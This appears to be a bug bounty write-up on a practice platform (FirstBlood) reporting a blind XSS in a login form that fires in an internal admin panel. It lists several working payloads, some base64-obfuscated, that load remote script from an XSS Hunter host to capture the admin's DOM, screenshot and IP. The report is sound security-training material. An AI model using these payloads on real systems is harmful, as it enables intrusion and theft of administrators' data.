FirstBlood-#1310 — Blind XSS on login page disclosing admin panel access
This issue was discovered on FirstBlood v3
On 2022-12-09, ar6aaz Level 3 reported:
Hello Team,
I have found a Blind XSS vulnerability on Firstbloodv3.
When you visit the login page, you will notice the message "Login attempts will be logged".
That made me think there could either be a Blind XSS or Log4j bug here. The application being built on PHP rules out Log4j, so I tried Blind XSS and it worked.
Steps to Reproduce:
- Go to the login page.
- Enter Blind XSS payload in the username/password fields.
You will receive a notification of your Blind XSS being fired in your inbox. The XSS fires on https://firstblood-helper.com/login_attempts.php?id=9056
You can create Blind XSS payloads by self hosting XSS hunter or by using an account on https://xsshunter.com. Some sample payloads that can be used and worked for me:
- "><script src=https://a6zxssht.xss.ht></script>
- javascript:eval('var a=document.createElement(\'script\');a.src=\'https://a6zxssht.xss.ht\';document.body.appendChild(a)')
- "><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYTZ6eHNzaHQueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== autofocus>
- "><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYTZ6eHNzaHQueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== onerror=eval(atob(this.id))>
- "><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYTZ6eHNzaHQueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==>
- "><iframe srcdoc="<script>var a=parent.document.createElement("script");a.src="https://a6zxssht.xss.ht";parent.document.body.appendChild(a);</script>">
- <script>$.getScript("//a6zxssht.xss.ht")</script>
Impact:
We are able to get a screenshot of admin panel where XSS gets fired for user Administrator-Sean.
Along with that, the Blind XSS also leaks other information like:
- IP address: https://www.ip-tracker.org/lookup.php?ip=86.145.182.70
- Entire DOM data
- Screenshot of Admin panel:

P1 CRITICAL
Endpoint: /login.php
Parameter: username/password
Payload: "><script src=https://a6zxssht.xss.ht></script>
FirstBlood ID: 72
Vulnerability Type: Stored XSS
Login attempts were logged on an internal panel on firstblood-helper.com and the username is vulnerable to blind XSS affecting FirstBlood staff
Creator & Administrator
Congratulations, you were the second user to report this! For finding this you have won yourself a LIMITED edition BugBountyHunter hat!